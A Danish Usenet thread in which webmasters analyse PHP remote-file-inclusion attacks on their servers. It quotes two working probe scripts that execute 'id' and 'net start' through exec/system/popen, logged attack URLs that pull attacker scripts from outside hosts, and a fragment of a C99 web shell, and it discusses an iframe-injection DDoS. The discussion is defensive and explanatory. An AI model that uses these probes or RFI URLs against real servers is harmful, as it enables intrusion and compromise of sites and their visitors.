---

Nogen har forsøgt at køre dette stykke kode mod min webserver - der er kaldt
en URL, hvorpå der befinder sig en text-fil, som indeholder koden.


Hvad gør koden, og hvordan ved jeg, om forehavendet er lykkedes?


<?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{
ini_restore("safe_mode"); ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); }else{
echo("Safe Mode of this Server is : "); echo("SafemodeON"); } } function
ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){
@exec($cfe,$res); $res = join("\n",$res); }
elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); }
elseif(function_exists('system')){ @ob_start(); @system($cfe); $res =
@ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res =
@ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f =
@popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .=
@fread($f,1024); } @pclose($f); } } return $res; } exit;


Også dette stykke kode er forsøgt kørt:



<?
$dir = @getcwd();
echo "FaStiDiO<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}}

exit;

---

Christian R. Larsen skrev:

> Nogen har forsøgt at køre dette stykke kode mod min webserver - der er kaldt
> en URL, hvorpå der befinder sig en text-fil, som indeholder koden.
>
> Hvad gør koden, og hvordan ved jeg, om forehavendet er lykkedes?

Umiddelbart forsøger man først at udskrive nogle oplysninger om systemet
- derefter er det muligt at få udført kommandoer og/eller vist filer fra
systemet.

Hvad sker der, hvis du selv kalder URL'en? Får du vist PHP-koden eller
udskriver den nogle oplysninger? - I sidstnævnte tilfælde bør du
betragte dit system som kompromitteret!

(Du bør selvfølgelig også overveje hvordan, filen er havnet på dit system).

M.v.h.

Jonathan

--
Er din email vigtig? Er du træt af, at din hjemmeside er nede?
Stabilt webhotel på redundant setup med daglig backup.
POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
http://www.jsp-hotel.dk/

---

Den 29-12-07 16.27 skrev Jonathan Stein følgende:

> (Du bør selvfølgelig også overveje hvordan, filen er havnet på dit system).

Filen ligger sikkert på en fremmed server. Min webserver er udsat for
masser af angreb i stil med:
/index.php?side=http://www.mta.cl/galeria2/galery.txt?

--
Mvh. Kim Ludvigsen
Lav flotte fotomosaikbilleder med Centarsia.
http://kimludvigsen.dk

---

Kim Ludvigsen wrote:

> Den 29-12-07 16.27 skrev Jonathan Stein følgende:
>
>> (Du bør selvfølgelig også overveje hvordan, filen er havnet på dit
>> system).
>
> Filen ligger sikkert på en fremmed server. Min webserver er udsat for
> masser af angreb i stil med:
> /index.php?side=http://www.mta.cl/galeria2/galery.txt?

Den er noget anderledes, og en del grimmere end OP's.
Den forsøger at tilføje en <iframe> til samtlige .php,.htm,.html filer på
systemet.

Hvis det lykkes, så vil samtlige brugere der besøger din side generere en
request til 'offeret'. Der er højst sandsynligt tale om et DDoS attack.[1]

En anden mulighed kunne være at 'snige' en, eksempelvis ActiveX, ind af
bagdøren ved brug af dine sider - Det kunne jo være at dine brugere stoler
på dig?

[1] Jeg får timeout på serveren, men en tur ovre i way back machine tyder
(Fatter ikke det der sprog) på, der er tale om en ISP.

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen wrote:
[snip lidt ævl]

Og det sørgelige i den forbindelse er, at 'de' udnytter de 'nemme ofre'
aka 'Jeg bruger Apache/PHP, så jeg er sikker' - folket.

--
Med venlig hilsen
Stig Johansen

---

Den 30-12-07 06.30 skrev Stig Johansen følgende:
> Kim Ludvigsen wrote:
>
>> Filen ligger sikkert på en fremmed server. Min webserver er udsat for
>> masser af angreb i stil med:
>> /index.php?side=http://www.mta.cl/galeria2/galery.txt?
>
> Den er noget anderledes, og en del grimmere end OP's.

Der er mange forskellige scripts, og de fleste af dem ligger på russiske
servere.

> [1] Jeg får timeout på serveren, men en tur ovre i way back machine tyder
> (Fatter ikke det der sprog) på, der er tale om en ISP.

Det ser heldigvis ud til, at udbyderne/hjemmesiderne er opmærksomme på
problemet, både med hensyn til scriptene og med hensyn til
angrebsadresserne. Det fleste scripts er væk allerede et par dage efter
forsøget. Jeg måtte gennem en del adresser, før jeg fandt en der virkede
(ovenstående), den har til gengæld været aktiv mindst siden den 4.
december.

--
Mvh. Kim Ludvigsen
Brug Thunderbird til mail, og undgå at få fyldt indbakken med spam.
http://kimludvigsen.dk

---

Kim Ludvigsen wrote:

> Den 30-12-07 06.30 skrev Stig Johansen følgende:
> Der er mange forskellige scripts, og de fleste af dem ligger på russiske
> servere.

Det er nok fordi det er dér, der er flest åbne servere.
Remote scriptet kan ligeså godt ligge på tante Oda's maskine.

>> [1] Jeg får timeout på serveren, men en tur ovre i way back machine tyder
>> (Fatter ikke det der sprog) på, der er tale om en ISP.
>
> Det ser heldigvis ud til, at udbyderne/hjemmesiderne er opmærksomme på
> problemet, både med hensyn til scriptene og med hensyn til
> angrebsadresserne.

Jeg er ikke 100% sikker på vi snakker om den/det samme.
Jeg tænker på _offeret_: <http://usuarios.arnet.com.ar>
Way back machine har ikke noget siden juni 2007, så det er nok deromkring
det er startet.
Det er ligegyldigt om scriptet bliver fjernet dagen efter, så længe det har
afleveret sin 'payload' - her inficering af 'web' sider med en <iframe>.

<guesstimate>
Offerets problem er, at der findes 1.000 vis af servere med 1.000 vis af
sider, der bliver kaldt af 1.000 vis af brugere.
</guesstimate>

Hver eneste visning til slutbrugeren vil, via <iframen>, generere et opslag
til offeret. Da den er angivet til 0-størrelse, vil slutbrugeren formentlig
ikke opdage at han deltager i et storstilet DDoS.
Offeret får ikke 'fred', hvis det nogensinde sker, før angrebet er stoppet
*og* der er ryddet op i samtlige inficerede servere/websider.

> Det fleste scripts er væk allerede et par dage efter
> forsøget.

Det er nok et spørgsmål om årsag og virkning. Jo flere angreb, der lykkes,
jo flere opslag får 'ejeren' af scriptet. Desværre er sandsynligheden for
at scriptet bliver fundet nok en funktion af succesraten for gennemførte
inficeringer.

--
Med venlig hilsen
Stig Johansen

---

Den 31-12-07 05.28 skrev Stig Johansen følgende:
> Kim Ludvigsen wrote:
>
>> Det ser heldigvis ud til, at udbyderne/hjemmesiderne er opmærksomme på
>> problemet, både med hensyn til scriptene og med hensyn til
>> angrebsadresserne.
>
> Jeg er ikke 100% sikker på vi snakker om den/det samme.

Du har ret, det gjorde vi ikke (eller rettere: Jeg vrøvlede ved at
medtage angrebsadresserne i ovenstående).

--
Mvh. Kim Ludvigsen
Undgå stegt lever: Sunbird hjælper dig med at huske bryllupsdagen.
http://kimludvigsen.dk

---

"Jonathan Stein" <jstein@image.dk> wrote in message
news:47766756$0$90270$14726298@news.sunsite.dk...
> Hvad sker der, hvis du selv kalder URL'en? Får du vist PHP-koden eller
> udskriver den nogle oplysninger? - I sidstnævnte tilfælde bør du betragte
> dit system som kompromitteret!

Jeg får ikke udlæst nogen kommandoer nej. Jeg får en fejl 404, hvis jeg
kalder den URL, hackeren har forsøgt sig med.

Og filen ligger i øvrigt på en fremmed server. Der kaldes en sti med
følgende udseende:

www.mitdomæne.dk/index.php?side=http://www.blablab.ch/admintools/to.txt?

> (Du bør selvfølgelig også overveje hvordan, filen er havnet på dit
> system).

Det er den så gudskelov ikke.

---

On Sun, 30 Dec 2007 07:07:03 +0100, "Christian R. Larsen"
<crlarsen@hotmail.com> wrote:

>Og filen ligger i øvrigt på en fremmed server. Der kaldes en sti med
>følgende udseende:
>
>www.mitdomæne.dk/index.php?side=http://www.blablab.ch/admintools/to.txt?

Nu du skriver om det, så kan jeg se at jeg også har en hel del
forespørgsler i den stil i min statistik.

Filen der spørges til hos mig er en fil der har en kendt sårbarhed i
det system(mxBB) jeg bruger. Jeg har bare slet ikke filen liggende, så
det giver en error 404.

Eksempler:
http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_andet_domæne.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_tredie_domæne.com/calendar/includes/php/base??
http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_fjerde_domæne/fed/id.txt?

Ialt er der 11 forskellige forespørgsler til mx_glance_sdesc.php på
den måde i statistikken.

Nu kommer de IP'er der har forespurgt på den fil i en .htaccess fil,
så de ikke længere har adgang.

--
Jens G
Kan anbefale http://www.everlove.dk til IP telefoni.
Besøg http://voip-user.dk for debat om ip-telefoni og udstyr.

---

On Sun, 30 Dec 2007 17:52:23 +0100, Jens G <nospam061106@kabelmail.dk>
wrote:

>Eksempler:
>http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_andet_domæne.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
>http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_tredie_domæne.com/calendar/includes/php/base??
>http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_fjerde_domæne/fed/id.txt?
>
>Ialt er der 11 forskellige forespørgsler til mx_glance_sdesc.php på
>den måde i statistikken.

Jeg prøvede lige at følge nogle af de 11 links.
Nogle filer er der ikke mere,andre er kode i stil med det Christian
postede, og atter andre er trojans og backdoors.

Det er forsøg på hacking, og jeg er overrasket over hvor tit det sker.

--
Jens G
Kan anbefale http://www.everlove.dk til IP telefoni.
Besøg http://voip-user.dk for debat om ip-telefoni og udstyr.

---

Christian R. Larsen skrev:

> www.mitdomæne.dk/index.php?side=http://www.blablab.ch/admintools/to.txt?

For en ordens skyld, så er det væsentlige, om du får en "Not found" på
den fil, der skulle ligge på dit system (altså
www.mitdomæne.dk/index.php i ovenstående eksempel) eller på hackerens
del (altså http://www.blablab.ch/admintools/to.txt).

Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke
har den fil, som hackeren prøver at misbruge, er der ingen grund til uro.

M.v.h.

Jonathan

--
Er din email vigtig? Er du træt af, at din hjemmeside er nede?
Stabilt webhotel på redundant setup med daglig backup.
POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
http://www.jsp-hotel.dk/

---

Den 30-12-07 18.45 skrev Jonathan Stein følgende:
> Christian R. Larsen skrev:
>
>> www.mitdomæne.dk/index.php?side=http://www.blablab.ch/admintools/to.txt?
>
> Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke
> har den fil, som hackeren prøver at misbruge, er der ingen grund til uro.

Den pågældende fil er der selvfølgelig (index.php), så spørgsmålet er
nærmere, om det er muligt at få afviklet hackerens del som et argument
på index.php.

Jeg har en fornemmelse af, at hackerne benytter botter, som
gennemtrevler nettet efter php-sider med et argument (hedder det
argument?) og en værdi, og når de finder en side, prøver de at angive
deres eget script som værdi.

--
Mvh. Kim Ludvigsen
Økonom Steffen Møller giver et bud på, hvordan internettet vil påvirke
forbrugernes valgmuligheder.
http://kimludvigsen.dk

---

Den 30-12-07 19.11 skrev Kim Ludvigsen følgende:

> Jeg har en fornemmelse af, at hackerne benytter botter, som
> gennemtrevler

Øv! gennemtrevler => gennemtrawler

--
Mvh. Kim Ludvigsen
Brug Thunderbird til mail, og undgå at få fyldt indbakken med spam.
http://kimludvigsen.dk

---

Kim Ludvigsen wrote:

> Jeg har en fornemmelse af, at hackerne benytter botter, som
> gennemtrevler nettet efter php-sider med et argument (hedder det
> argument?) og en værdi, og når de finder en side, prøver de at angive
> deres eget script som værdi.

Det gør de, og det har de gjort længe.
Nu ved jeg godt jeg gætter, men hver mand har vel sin opfattelse af tingene.

Der er forskellige angrebsvektorer/faser i det her spil.
Fase 1 er 'bogføring' af potentielle aktiver. Det er dét der foregår med
'Christians' script. Resultatet af denne operation er 1) Om der er adgang,
og 2) hvis der er, leveres en brugerliste samt oplysning om OS og ledig
plads på systemet.
Bemærk her, at 'Christians' script ikke efterlader sig andet spor end en
log-entry.
Nu har jeg ikke min Apache kørende p.t., men jeg vil gætte på, at det er et
low-frequency 'attack' for at holde sig 'below the radar'.

Nu har 'vi' en dejlig stor database med navngivne
servere/OS/brugere/diskplads.

Fase 2 er angrebet('dit' script).
Vi skal lige finde et sted at placere vores 'remote' script. Vi søger efter
et tilfældigt sted i vores database, og lægger scriptet her.
Så er vi klar, så vi 'ringer' til vores botnet og beder dem om at gå i gang.

Det her er kun det aktuelle eksempel, men _brugeroplysningerne_ kan også
bruges til eksempelvis dictionary attack. (Hmm.. var der nogen der sagde
ssh?).

Nu har jeg ikke adgang til min server p.t. (IBM DeathStart(TM) var det
Christian E Lysel?), men så vidt jeg husker, så har det her foregået i
'mange' år.

Var der ikke noget med PhpBB engang - tjekker lige af med Google ....
Jo, den er god nok:
<http://news.netcraft.com/archives/2004/12/21/santy_worm_spreads_through_phpbb_forums.html>
Her udnyttede man en navngiven funktion
<http://www.securiteam.com/unixfocus/6J00O15BPS.html>
Men dengang brugte 'man' en søgning efter 'viewtopic.php' på Google som
'database'.

--
Med venlig hilsen
Stig Johansen

---

Kim Ludvigsen skrev:

>> Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke
>> har den fil, som hackeren prøver at misbruge, er der ingen grund til uro.
>
> Den pågældende fil er der selvfølgelig (index.php), så spørgsmålet er
> nærmere, om det er muligt at få afviklet hackerens del som et argument
> på index.php.

Jeg gik ud fra, at det var et konstrueret eksempel. (mitdomæne.dk er i
hvert fald ikke registreret til Christian).

Men der er for så vidt slet ikke nogen garanti for, at Christian
overhovedet kører PHP. Jeg ser mange forsøg på at fiske efter
sårbarheder som slet ikke er mulige på det aktuelle system.

Hvis en hacker tester, om der skulle ligge en index.php i roden af
domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det
samme for at se, om siden er sårbar.

M.v.h.

Jonathan

--
Er din email vigtig? Er du træt af, at din hjemmeside er nede?
Stabilt webhotel på redundant setup med daglig backup.
POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
http://www.jsp-hotel.dk/

---

Den 31-12-07 14.47 skrev Jonathan Stein følgende:
> Kim Ludvigsen skrev:

> Hvis en hacker tester, om der skulle ligge en index.php i roden af
> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det
> samme for at se, om siden er sårbar.

Min henvisning til index.php var ud fra det nævnte eksempel. Ved
ovennævnte metode ville de kun få gevinst, hvis sitet bruger "page". De
er lidt smartere. De leder efter php-sider med værdier, og så udskifter
de værdien med deres eget script. På et af mine sites, prøver de således
at køre index.php?side=script, mens de på et andet prøver at køre
ordforklaring.php?forklaring=script.

--
Mvh. Kim Ludvigsen
35 tips & tricks til Internet Explorer.
http://kimludvigsen.dk

---

Kim Ludvigsen wrote:

> På et af mine sites, prøver de således
> at køre index.php?side=script, mens de på et andet prøver at køre
> ordforklaring.php?forklaring=script.

Er de begyndt på _dansk_?
(Har ikke selv en log at kigge i)

--
Med venlig hilsen
Stig Johansen

---

Den 01-01-08 07.22 skrev Stig Johansen følgende:
> Kim Ludvigsen wrote:
>
>> På et af mine sites, prøver de således
>> at køre index.php?side=script, mens de på et andet prøver at køre
>> ordforklaring.php?forklaring=script.
>
> Er de begyndt på _dansk_?
> (Har ikke selv en log at kigge i)

De er "sprogløse", forstået på den måde, at de er ligeglade med, om der
står "page", "side" eller noget helt tredje, og de er ligeglade med hvad
det pågældende ord betyder. Du udskifter blot værdien.

--
Mvh. Kim Ludvigsen
Skrot mus og tastatur, i fremtiden kan du styre computeren med stemmen,
tanken - eller dit humør.
http://kimludvigsen.dk

---

Kim Ludvigsen skrev:

>> Hvis en hacker tester, om der skulle ligge en index.php i roden af
>> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det
>> samme for at se, om siden er sårbar.
>
> Min henvisning til index.php var ud fra det nævnte eksempel. Ved
> ovennævnte metode ville de kun få gevinst, hvis sitet bruger "page". De
> er lidt smartere. De leder efter php-sider med værdier, og så udskifter
> de værdien med deres eget script. På et af mine sites, prøver de således
> at køre index.php?side=script, mens de på et andet prøver at køre
> ordforklaring.php?forklaring=script.

I det tilfælde går de ganske åbenlyst efter eksisterende filer, men man
skal heller ikke blive overrasket hvis ens log indeholder forespørgsler
efter filer, der slet ikke findes på ens system.

M.v.h.

Jonathan

--
Er din email vigtig? Er du træt af, at din hjemmeside er nede?
Stabilt webhotel på redundant setup med daglig backup.
POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
http://www.jsp-hotel.dk/

---

"Jonathan Stein" <jstein@image.dk> wrote in message
news:4778f30c$0$90264$14726298@news.sunsite.dk...
> Kim Ludvigsen skrev:
>
>>> Hackerens fil kan være forsvundet i mellemtiden, men hvis du slet ikke
>>> har den fil, som hackeren prøver at misbruge, er der ingen grund til
>>> uro.
>>
>> Den pågældende fil er der selvfølgelig (index.php), så spørgsmålet er
>> nærmere, om det er muligt at få afviklet hackerens del som et argument på
>> index.php.
>
> Jeg gik ud fra, at det var et konstrueret eksempel. (mitdomæne.dk er i
> hvert fald ikke registreret til Christian).
>
> Men der er for så vidt slet ikke nogen garanti for, at Christian
> overhovedet kører PHP. Jeg ser mange forsøg på at fiske efter sårbarheder
> som slet ikke er mulige på det aktuelle system.
>
> Hvis en hacker tester, om der skulle ligge en index.php i roden af
> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det
> samme for at se, om siden er sårbar.

Jeg forstår ikke, hvordan man kan bruge det til at se, om siden eere sårbar.
Hvordan virker det?

---

Christian R. Larsen skrev:

>> Hvis en hacker tester, om der skulle ligge en index.php i roden af
>> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det
>> samme for at se, om siden er sårbar.
>
> Jeg forstår ikke, hvordan man kan bruge det til at se, om siden eere sårbar.
> Hvordan virker det?

Hvis "xxx" er en URL til en fil med noget PHP-kode, kan hackeren se, om
koden bliver udført - og i så fald har han (formentlig) fri adgang til
at få udført sin egen kode.

M.v.h.

Jonathan

--
Er din email vigtig? Er du træt af, at din hjemmeside er nede?
Stabilt webhotel på redundant setup med daglig backup.
POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
http://www.jsp-hotel.dk/

---

"Jonathan Stein" <jstein@image.dk> wrote in message
news:477d0541$0$90274$14726298@news.sunsite.dk...
> Christian R. Larsen skrev:
>
>>> Hvis en hacker tester, om der skulle ligge en index.php i roden af
>>> domænet, så kan han jo lige så godt smide en "?page=xxx" efter med det
>>> samme for at se, om siden er sårbar.
>>
>> Jeg forstår ikke, hvordan man kan bruge det til at se, om siden eere
>> sårbar. Hvordan virker det?
>
> Hvis "xxx" er en URL til en fil med noget PHP-kode, kan hackeren se, om
> koden bliver udført - og i så fald har han (formentlig) fri adgang til at
> få udført sin egen kode.

Nu kender jeg ikke meget til PHP, så jeg forstår ikke umiddelbart, hvorfor
den skulle blive udført.

Jeg har primært anvendt ASP, hvor jeg ikke umiddelbart kan se, hvorfor
minside.asp?page=http://farlighacker.ch/text.txt skulle medføre afvikling af
kode.

Er det noget specielt ved PHP, eller hænger det slet og ret sammen med, at
mange bare har designet deres sider sådan, at man ved kald til
minside.php?page=blabla vil kunne få afviklet blabla?

---

Christian R. Larsen skrev:

> Er det noget specielt ved PHP, eller hænger det slet og ret sammen med, at
> mange bare har designet deres sider sådan, at man ved kald til
> minside.php?page=blabla vil kunne få afviklet blabla?

Det er ikke PHP-specifikt - i ASP kunne man f.eks. have skrevet:
Server.Execute(Request("page"))

- Men Server.Execute var vist ikke med i de tidlige versioner af ASP, så
der er måske oftere tradition for at lave noget i stil med:
if Request("page") = "side1" then
<!--#include file="side1"-->

- som ikke er sårbar på samme måde.

M.v.h.

Jonathan

--
Er din email vigtig? Er du træt af, at din hjemmeside er nede?
Stabilt webhotel på redundant setup med daglig backup.
POP3, IMAP, PHP, JSP, Java, Perl, Python, Telnet, SSH, Cron-jobs m.v.
http://www.jsp-hotel.dk/

---

On Tue, 2008-01-01 at 13:59 +0100, Jens G wrote:
> F.eks. detected: Trojan program Backdoor.PHP.C99Shell.d

Det har den jo ret i

> Det er muligt den skal eksekveres af php, men jeg ved det ikke.

Hvis du ikke har PHP installeret og associeret den fil type til at blive
fortolket af PHP fortolkeren, er der intet problem, og du vil blot se
det som et helt simpelt fladt tekst dokument.

---

Christian R. Larsen wrote:

> $cmd="id";
> $eseguicmd=ex($cmd);
> echo $eseguicmd;

Fra man id:
ID(1) User Commands ID(1)
NAME
id - print real and effective UIDs and GIDs

>
> function ex($cfe){
> $res = '';
> if (!empty($cfe)){
> if(function_exists('exec')){

Fra man exec:
exec(n) Tcl Built-In Commands exec(n)
_________________________________________________________________

NAME
exec - Invoke subprocess(es)


Osv. osv.

--
Med venlig hilsen
Stig Johansen

---

On Sun, 2007-12-30 at 17:52 +0100, Jens G wrote:
> http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_andet_domæne.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
> http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_tredie_domæne.com/calendar/includes/php/base??
> http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_fjerde_domæne/fed/id.txt?

Du behøver ikke at skjule deres sti, en google søgning giver stien.

> Nu kommer de IP'er der har forespurgt på den fil i en .htaccess fil,
> så de ikke længere har adgang.

Adgang til et mislykket angreb?

Hvis du går og har for meget tid, kan du rette scriptet så der svare
noget fornuftigt og på den måde studere angrebet.

---

On Sun, 30 Dec 2007 18:51:47 +0100, "Christian E. Lysel"
<christian@example.net> wrote:

>
>On Sun, 2007-12-30 at 17:52 +0100, Jens G wrote:
>> http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_andet_domæne.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
>> http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_tredie_domæne.com/calendar/includes/php/base??
>> http://mit_domæne/contrib/mx_glance_sdesc.php?mx_root_path=http://www.et_fjerde_domæne/fed/id.txt?
>
>Du behøver ikke at skjule deres sti, en google søgning giver stien.

Det var mere for fuldt offentligt at give stien til noget skidt.
>
>> Nu kommer de IP'er der har forespurgt på den fil i en .htaccess fil,
>> så de ikke længere har adgang.
>
>Adgang til et mislykket angreb?

Det irriterer mig at nogle forsøger at hacke sitet.
>
>Hvis du går og har for meget tid, kan du rette scriptet så der svare
>noget fornuftigt og på den måde studere angrebet.
>
Hvordan mener du?

--
Jens G
Kan anbefale http://www.everlove.dk til IP telefoni.
Besøg http://voip-user.dk for debat om ip-telefoni og udstyr.

---

On Sun, 2007-12-30 at 21:46 +0100, Jens G wrote:
> >Du behøver ikke at skjule deres sti, en google søgning giver stien.
>
> Det var mere for fuldt offentligt at give stien til noget skidt.

Det er et tekst dokument ... der er intet galt i det, indtil man henter
det og køre det igennem en php fortolker.

> >Adgang til et mislykket angreb?
>
> Det irriterer mig at nogle forsøger at hacke sitet.

Velkommen til Internet.

Brug din energi på noget bedre.

> >Hvis du går og har for meget tid, kan du rette scriptet så der svare
> >noget fornuftigt og på den måde studere angrebet.
> >
> Hvordan mener du?

Du kan rette contrib/mx_glance_sdesc.php scriptet til i tilfældet hvor
argumentet er mx_root_path=http at returnere nogle ting de forventer.

Ergo må de betragte deres søgen efter sårbarheden
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5178 som en
succes, og senere vil de evt. prøve at udnytte dette.

Det er en sårbarhed der er over 3 måneder gammel.

Har du følgende portal installeret og opdateret?

http://www.mx-system.com/

---

On Mon, 31 Dec 2007 02:30:01 +0100, "Christian E. Lysel"
<christian@example.net> wrote:

>
>On Sun, 2007-12-30 at 21:46 +0100, Jens G wrote:
>> >Du behøver ikke at skjule deres sti, en google søgning giver stien.
>>
>> Det var mere for fuldt offentligt at give stien til noget skidt.
>
>Det er et tekst dokument ... der er intet galt i det, indtil man henter
>det og køre det igennem en php fortolker.

Nogle af de andre links indeholdt trojans og backdoors. Kaspersky
skreg ihvertfald godt op da jeg tjekkede.

[...]
>> >Hvis du går og har for meget tid, kan du rette scriptet så der svare
>> >noget fornuftigt og på den måde studere angrebet.
>> >
>> Hvordan mener du?
>
>Du kan rette contrib/mx_glance_sdesc.php scriptet til i tilfældet hvor
>argumentet er mx_root_path=http at returnere nogle ting de forventer.
>
>Ergo må de betragte deres søgen efter sårbarheden
>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5178 som en
>succes, og senere vil de evt. prøve at udnytte dette.
>
>Det er en sårbarhed der er over 3 måneder gammel.
>
>Har du følgende portal installeret og opdateret?
>
> http://www.mx-system.com/
>
Ja, det er det jeg bruger.
Den er opdateret, og mx_glance_sdesc.ph findes forøvrigt slet ikke på
mit system, og har aldrig været der.

Jeg tror de har en base over MX systemer, og så prøver de bare om der
er filer de ved kan være sårbare.

--
Jens G
Kan anbefale http://www.everlove.dk til IP telefoni.
Besøg http://voip-user.dk for debat om ip-telefoni og udstyr.

---

On Mon, 2007-12-31 at 09:44 +0100, Jens G wrote:
> >Det er et tekst dokument ... der er intet galt i det, indtil man henter
> >det og køre det igennem en php fortolker.
>
> Nogle af de andre links indeholdt trojans og backdoors. Kaspersky
> skreg ihvertfald godt op da jeg tjekkede.

Hvilke?

> Jeg tror de har en base over MX systemer, og så prøver de bare om der
> er filer de ved kan være sårbare.

Det tror jeg ikke, det er nemmere blot at bruge google.

---

On Mon, 31 Dec 2007 17:21:33 +0100, "Christian E. Lysel"
<christian@example.net> wrote:

>
>On Mon, 2007-12-31 at 09:44 +0100, Jens G wrote:
>> >Det er et tekst dokument ... der er intet galt i det, indtil man henter
>> >det og køre det igennem en php fortolker.
>>
>> Nogle af de andre links indeholdt trojans og backdoors. Kaspersky
>> skreg ihvertfald godt op da jeg tjekkede.
>
>Hvilke?

Loggen siger:
detected: Trojan program Backdoor.PHP.Small.o
URL: http://randymacXXXXXXX.com/myevent/var/echo
detected: Trojan program Backdoor.PHP.C99Shell.d
URL: http://fr3dcv1.100freeXXXXXXX.com/shell.txt????????

Dem som så har lyst til at se på det, må fjerne X'erne.

Jeg afprøvede ikke alle links. Syntes ikke der var grund til at løbe
risiko.
>
>> Jeg tror de har en base over MX systemer, og så prøver de bare om der
>> er filer de ved kan være sårbare.
>
>Det tror jeg ikke, det er nemmere blot at bruge google.
>
Måske. Jeg ved det ikke.

--
Jens G
Kan anbefale http://www.everlove.dk til IP telefoni.
Besøg http://voip-user.dk for debat om ip-telefoni og udstyr.

---

On Mon, 2007-12-31 at 17:36 +0100, Jens G wrote:
> URL: http://randymacXXXXXXX.com/myevent/var/echo

Den er pillet ned

> detected: Trojan program Backdoor.PHP.C99Shell.d
> URL: http://fr3dcv1.100freeXXXXXXX.com/shell.txt????????

<?php
/*
******************************************************************************************************
*
*   

.... En bunke russiske kommentar.

//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime()
{list($usec, $sec) = explode(" ", microtime()); return ((float)$usec +
(float)$sec);}}
error_reporting(5);

.... Og så starter PHP koden.

Det er kun "farligt" hvis man gemme filen på sin maskine, og lader PHP
køre scriptet.

Hvis din maskine udførte angrebet ville angriberen få en side som
http://www.easy-play.eu/c99.php

Hvilket reelt giver angriberen et meget nemt grafisk værktøj til at
angribe din maskine med.


> Jeg afprøvede ikke alle links. Syntes ikke der var grund til at løbe
> risiko.

Hvilken risiko?

> >> Jeg tror de har en base over MX systemer, og så prøver de bare om der
> >> er filer de ved kan være sårbare.
> >
> >Det tror jeg ikke, det er nemmere blot at bruge google.
> >
> MÃ¥ske. Jeg ved det ikke.

Andre eksempler på at google kan bruges til at søge efter sårbarheder:

http://johnny.ihackstuff.com/ghdb.php

---

On Mon, 31 Dec 2007 20:37:47 +0100, "Christian E. Lysel"
<christian@example.net> wrote:

>
>> Jeg afprøvede ikke alle links. Syntes ikke der var grund til at løbe
>> risiko.
>
>Hvilken risiko?

Når antivirus kommer og siger der er noget skidt, så tror jeg da på
det.
Og så forestiller jeg mig at der også kan være skidt som ikke er i mit
antivirusprograms base endnu.
>
>> >> Jeg tror de har en base over MX systemer, og så prøver de bare om der
>> >> er filer de ved kan være sårbare.
>> >
>> >Det tror jeg ikke, det er nemmere blot at bruge google.
>> >
>> Måske. Jeg ved det ikke.
>
>Andre eksempler på at google kan bruges til at søge efter sårbarheder:
>
> http://johnny.ihackstuff.com/ghdb.php

En ret god samling af sårbarheder, må man sige.

--
Jens G
Kan anbefale http://www.everlove.dk til IP telefoni.
